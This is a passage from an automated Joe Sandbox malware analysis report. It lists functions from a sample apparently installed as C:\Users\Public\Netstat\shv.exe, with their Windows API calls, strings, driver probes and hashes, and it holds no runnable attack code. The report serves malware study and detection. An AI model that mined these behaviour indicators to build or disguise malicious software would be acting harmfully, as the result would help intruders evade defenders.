                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleThread__wcstoi64
                                                                                        • String ID: *AutoICFConfig$Client
                                                                                        • API String ID: 3257255551-59951473
                                                                                        • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                        • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                        • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                        • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                        Function 11070C60 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                        • String ID: Push
                                                                                        • API String ID: 1566154052-4278761818
                                                                                        • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                        • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                        • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                        • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                        Function 00F01020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCommandLineA.KERNEL32 ref: 00F01027
                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00F0107B
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00F01096
                                                                                        • ExitProcess.KERNEL32 ref: 00F010A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4131565154.0000000000F01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F00000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4131549170.0000000000F00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_f00000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                        • String ID:
                                                                                        • API String ID: 2164999147-0
                                                                                        • Opcode ID: dc1bb6903313550a2b9cb297aaffe469805179dbc7a0f2b8b801d5069d2dddec
                                                                                        • Instruction ID: 4e1141ea8c13dac032d09b9661698debac55257390806c8b258f6652198fa82a
                                                                                        • Opcode Fuzzy Hash: dc1bb6903313550a2b9cb297aaffe469805179dbc7a0f2b8b801d5069d2dddec
                                                                                        • Instruction Fuzzy Hash: 2611C060C083C85AEF315F6088887EABFA5BF023A0F240048EDD6961CAD25648C7F7B5
                                                                                        Function 110306E7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                        • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 1314093303-0
                                                                                        • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                        • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                        • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                        • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                        Function 11143C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                        • String ID: C:\Users\Public\Netstat\shv.exe
                                                                                        • API String ID: 2251294070-727063226
                                                                                        • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                        • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                        • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                        • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                        Function 11014FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle
                                                                                        • String ID: \\.\NSWFPDrv
                                                                                        • API String ID: 3498533004-85019792
                                                                                        • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                        • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                        • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                        • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                        Function 1115BDE0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _calloc
                                                                                        • String ID:
                                                                                        • API String ID: 1679841372-0
                                                                                        • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                        • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                        • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                        • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                        Function 11111430 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                        • __wsplitpath.LIBCMT ref: 11111475
                                                                                          • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                        • String ID:
                                                                                        • API String ID: 1847508633-0
                                                                                        • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                        • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                        • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                        • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                        Function 1109E9E0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                          • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                          • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                          • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                          • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00B5F810,?,00000001,00000001), ref: 1109E9A3
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2256153495-0
                                                                                        • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                        • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                        • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                        • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                        Function 1110F720 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InitializeCriticalSection.KERNEL32(111F0908,1B492F88,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                        • EnterCriticalSection.KERNEL32(111F0908,1B492F88,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                        • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                        • String ID:
                                                                                        • API String ID: 3991485460-0
                                                                                        • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                        • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                        • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                        • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                        Function 11068950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: ??CTL32.DLL
                                                                                        • API String ID: 1029625771-2984404022
                                                                                        • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                        • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                        • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                        • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                        Function 11026B40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
